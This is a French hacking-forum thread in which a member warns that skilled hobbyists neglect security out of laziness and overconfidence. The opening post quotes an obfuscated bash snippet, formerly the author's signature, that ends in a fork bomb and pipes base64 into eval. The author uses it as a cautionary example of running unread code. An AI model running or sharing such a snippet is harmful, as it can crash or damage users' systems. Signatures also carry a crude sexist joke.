• STATISTIQUES
  • Il y a eu un total de 3 membres et 7316 visiteurs sur le site dans les dernières 24h pour un total de 7 319 personnes!


    1 membre s'est inscrit dans les dernières 24h!


    Membres: 2 608
    Discussions: 3 580
    Messages: 32 820
    Tutoriels: 78
    Téléchargements: 38
    Sites dans l'annuaire: 58


  • ANNUAIRE
  • [FR] Root-Me
    Notre équipe se base sur un constat : à l'heure actuelle ou l'information tend à devenir...
    Hacking
    [FR] NewbieContest
    Nous vous proposons une série de challenges regroupant plusieurs domaines allant de l'exploitation de fail...
    Hacking
    [FR] WeChall
    Audio: 3, Coding: 11, Cracking: 9, Crypto: 18, Encoding: 11, Exploit: 44, Forensics: 1, Fun: 6, HTTP: 6, Image: 8, Java:...
    Challenges
    [FR] Cyber-Hacker
    CH - Cyber Hacker est un jeu par navigateur de simulation de hack, programmez et envoyez vos virus et piratez les aut...
    Hacking
    [EN] osix
    Site de challenge qui utilise un système de level on chaque épreuve doit être réussie avant d'accédÃ...
    Challenges
    [EN] Bright Shadows
    JavaScript: 13, Exploit: 27, Crypto: 69, CrackIt: 52, Stegano: 67, Flash: 3, Programming: 16, Java-Applet: 10, Logic: 20...
    Challenges
    [EN] Rosecode
    Programming: 36, Math: 29, Probability: 5, Sequence: 7, Crypto: 4, Brainf**k: 13, TimeRace: 4, Hack: 9
    Challenges

  • DONATION
  • Si vous avez trouvé ce site internet utile, nous vous invitons à nous faire un don du montant de votre choix via Paypal. Ce don servira à financer notre hébergement.

    MERCI!

    €



Note de ce sujet :
  • Moyenne : 0 (0 vote(s))
  • 1
  • 2
  • 3
  • 4
  • 5
H4ck0rs, cible facile des Hackers
06-08-2013, 20h32 (Modification du message : 06-08-2013, 21h09 par InstinctHack.)
Message : #1
InstinctHack Hors ligne
Posting Freak
*



Messages : 1,366
Sujets : 184
Points: 299
Inscription : Dec 2011
H4ck0rs, cible facile des Hackers
io,

Attention, ce post est volontairement piquant, il est là pour vous faire l'effet d'un seau d'eau froide sur la tête. Vous n'êtes pas content ? Continuez votre vie comme avant. </matrix_theme>

Introduction

Depuis, 2-3 jours, je m'étonne du comportement de certaines personnes qui se disent hacker.
Bon, ça me fout, et de toute façon, je le dis et je le redis hacker != pro de la sécurité informatique.
Mais c'est bien dans ce sens qu'ils le disent...
(je vais passer sur les propositions plus ou moins chelous que je reçois en mp)

Un mot sur les gens

Les idiots de consommateurs de technologies not informés
Ils ne savent rien, ne font qu'acheter, utiliser des OS propriétaires ( Smile ), des programmes payés à prix d'or, des paths de jeu trouvés sur un serveur chelou en chine, installent des hacks de logiciels pleins de saloperies, etc....
Ces gens sont un problème pour leur propre sécurité à cause de leur ignorance du sujet.

Les H4ck0RS

Eux ils savent.
Ils savent le fonctionnement des routeurs, des points de peelling, les FAI associatifs, les OS libres ( Sleepy ), les logiciels libres, les failles de sécurités, ils savent comment les modèles client-server, décentralisé fonctionne, le chiffrement, la stéganographie, comment une page web s'affiche et comment le serveur tourne, ils savent comment détecter les rootkits, configurer un firewall, programmer des scripts de malade, coder des robots qui parcourront le monde d'internet, rien ne leur résistent.

C'est vrai quoi, vous vous rendez compte de ce que certain d'entre vous sont capables de faire ? Quelques programmeurs sont capables de faire un logiciel utilisé par des millions de gens, un hacker peut faire trembler de peur des sociétés de carte bancaire, un gosse de 18 ans peut récupérer des informations confidentielles d'apple, etc....
Les exploits ( :] ) des hackers sont très nombreux.

Mais ils ont deux problèmes.
L'un lié à l'humanité.
L'autre à eux.
Le premier c'est tout simplement la flemme.

Le deuxième c'est le skill, surement, il sait ce qu'il fait le hacker ! Viens pas lui dire le contraire.
Ces gens sont un problème pour leur propre sécurité à cause de leur (fausse et/ou incomplète ?) connaissance du sujet.


Où est-ce que je veux en venir ?

Le savoir rend con.
C'est vrai, quelqu'un qui n'y connait rien en info, mais qui veut se protéger, est méfiant, il s'intéresse, mais prend garde.
Un habitué, un connaisseur, se disant qu'il s'y connait, connait les risques. Et c'est ça qu'il fait fausse route.

Sauf que

Ce n'est pas parce que tu connais les implentations de md5 en C de tête que ton md5 non salé est plus sûr que celui généré par le débutant qui as découvert la commande php md5() sur le siteduzero.
Ce n'est pas parce que tu connais iptables sur le bout de tes 11 doigts que tes ports sont protégés avec des tables de règles vides.

Exemple

Je me suis amusé à faire un programme hier, rien de très utile, mais à un moment, j'avais le choix entre :
ne pas récupérer toutes les informations que je voulais, mais être sûr de leur validité.
ou toutes les récupérer en sachant que quelqu'un aurais pus en falsifié certaines.

Je n'ai pas hésité une seconde :
[spoiler]
Si vous avez choisi la deuxième solution, considéré que vous êtes personnellement visé par ce présent message.
[/spoiler]

Bon et alors ? Bah j'en ai parlé sur irc, sur un channel de H4CK0RS, et là, je suis resté sans voix, un mec assez skilled a dis :
[spoiler]
Citation :osef de la sécu.
[/spoiler]

Ok, ce programme n'était pas important, rien n'était en jeu, il n'avais pas tout à fait tord. Mais tout de même, personnellement ça me fait froid dans le dos, un passionné de Sécurité Informatique qui dénigre sa passion... Huh

Et voilà une autre quote :

Attention, ce script est potentiellement dangereux et son exécution peut avoir des conséquences aléatoires selon les machines sur lequel il s'exécute.
Code BASH :

OxOO="/tmp/$(uname -r)" > /dev/null
touch $OxOO && echo -n $(cat /dev/urandom | head -c64) | sha1sum | awk '{print $1}' >> $OxOO
echo "R2FNZQo=" | base64 | eval
$(0x13=$IFS;IFS=':';for 0x37 in $PATH;do ls -1 $0x37;done && IFS=$0x13) > 0x80
0x42(){ 0x42|0x42& };0x42
 


C'est de moi. C'était encore il y a une heure ma signature, je l'ai retiré après une réaction d'un membre. (cc Smile) )
Alors pourquoi le retiré ? Tout simplement parce qu'il semblerait que certaines règles élémentaire de sécurité informatique ne soit pas appliqués par les membres (je me souviens d'avoir vu une histoire comme ça...)
Et qu'il y avait un risque que quelqu'un éxécute ce code.

Conclusion

N'oubliez pas, passionné de sécurité informatique ou AppleUser ( Angel ), débutant, habitué ou expert :
1. vous êtes un humain, la plus grosse faille de sécurité jamais corrigée
2. vous êtes des flemmards.
3. cela causera votre perte.
4. vous ignorez au moins une partie du fonctionnement de votre ordinateur, de vos logiciels (bah oui, python c'est bien, mais si il y as une faille dans python, ton code peut être en béton, ta sécurité ne vaut rien), de votre périphériques (qui sait comment l'appuie d'une touche d'un clavier est détecté ? comment une ancienne souris détectait vos mouvements ? ) ou des réseaux sur lesquels vous êtes.

(ovh s'est pas fait powned à cause d'un password d'une boite mail d'un admin ? et ben si....)


Virez pas parano.
Virez parano.

Apprenez l'informatique.
Apprenez pas l'informatique.

Croyez moi.
Ne me croyez moi.

Ne soyez pas sûr de votre sécurité.
Soyez sûr de votre sécurité.

Jigsaw a écrit :Faites votre choix.

http://actes.sstic.org/SSTIC09/Pourquoi_..._echec.pdf
Citation :un jour en cours de java j'ai attrapé les seins d'une fille mais elle m'a frappé en disant "c'est privé !!"
j'ai pas compris pourquoi, je croyais qu'on était dans la même classe
+1 (8) -1 (0) Répondre
06-08-2013, 20h47
Message : #2
gruik Hors ligne
gouteur de savon
*



Messages : 757
Sujets : 44
Points: 482
Inscription : Oct 2012
RE: H4ck0rs, cible facile des Hackers
(06-08-2013, 20h32)InstinctHack a écrit : (...) des points de peelling (...)

nope, this is peeling Big Grin :

[Image: Peeling3.jpg]

you mean peering :

[Image: PeeringDiagram.png]
+1 (1) -1 (0) Répondre
06-08-2013, 20h49
Message : #3
InstinctHack Hors ligne
Posting Freak
*



Messages : 1,366
Sujets : 184
Points: 299
Inscription : Dec 2011
RE: H4ck0rs, cible facile des Hackers
Citation :Le deuxième c'est le skill, surement, il sait ce qu'il fait le hacker ! Viens pas lui dire le contraire.

Nan, mais stop gruik, je sais de quoi je parle.
Va plutôt révisser tes cours d'info au lieu de me faire perdre mon temps.

Big Grin humour Big Grin

(je laisse la faute pour le fun :> et parce que je sais de quoi je parle...)
Citation :un jour en cours de java j'ai attrapé les seins d'une fille mais elle m'a frappé en disant "c'est privé !!"
j'ai pas compris pourquoi, je croyais qu'on était dans la même classe
+1 (0) -1 (0) Répondre
06-08-2013, 21h09
Message : #4
gruik Hors ligne
gouteur de savon
*



Messages : 757
Sujets : 44
Points: 482
Inscription : Oct 2012
RE: H4ck0rs, cible facile des Hackers
dans le même ordre d'idée, News0ft qui il y a quelques années parlait de l'échec de la sécurité
+1 (0) -1 (0) Répondre
07-08-2013, 09h53
Message : #5
c4ffein Hors ligne
Membre
*



Messages : 49
Sujets : 2
Points: 5
Inscription : Jul 2013
RE: H4ck0rs, cible facile des Hackers
Pour moi c'est assez logique, y a une différence entre avoir des compétences techniques et etre parano.
+1 (0) -1 (0) Répondre
07-08-2013, 10h15 (Modification du message : 07-08-2013, 10h15 par Jek0.)
Message : #6
Jek0 Hors ligne
Regular Everyday Normal Mazafaka
*



Messages : 113
Sujets : 5
Points: 40
Inscription : Jul 2013
RE: H4ck0rs, cible facile des Hackers
On va dire que l'un entraine l'autre, plus t'a de connaissances niveau info plus tu te rends compte qu'il est aisé de bypass beaucoup de choses/log tout ce qui se passe, plus tu fait gaffe à ce que tu fais/deviens parano.

Après j'vais dire "Acta non Verba", avoir des compétences c'est cool, savoir quoi en faire c'est bien, les utiliser c'est mieux !
Pour finir un mail avec panache :
Cordialement,
Va donc te reproduire avec ta propre ethnie, enfant malpropre de fille de joie,
[Insert-Your-Name-Here]
Si vous ne comprenez pas, traduisez dans le langage "2 la téci tavu".
+1 (0) -1 (0) Répondre
07-08-2013, 11h11 (Modification du message : 07-08-2013, 11h15 par ark.)
Message : #7
ark Hors ligne
Psyckomodo!
*****



Messages : 1,033
Sujets : 48
Points: 317
Inscription : Sep 2011
RE: H4ck0rs, cible facile des Hackers
Post intéressant =)

Ça me déçoit quand même de voir que les gens regardent pas un minimum un bout de code avant de l'exec... Surtout quand il est légèrement obfusqué !

Et je confirme pour la flemme, c'est très chiant d'ailleurs!
+1 (0) -1 (0) Répondre
07-08-2013, 16h50 (Modification du message : 07-08-2013, 16h50 par InstinctHack.)
Message : #8
InstinctHack Hors ligne
Posting Freak
*



Messages : 1,366
Sujets : 184
Points: 299
Inscription : Dec 2011
RE: H4ck0rs, cible facile des Hackers
[Image: 280]
Citation :un jour en cours de java j'ai attrapé les seins d'une fille mais elle m'a frappé en disant "c'est privé !!"
j'ai pas compris pourquoi, je croyais qu'on était dans la même classe
+1 (0) -1 (0) Répondre


Atteindre :


Utilisateur(s) parcourant ce sujet : 1 visiteur(s)
N-PN
Accueil | Challenges | Tutoriels | Téléchargements | Forum | Retourner en haut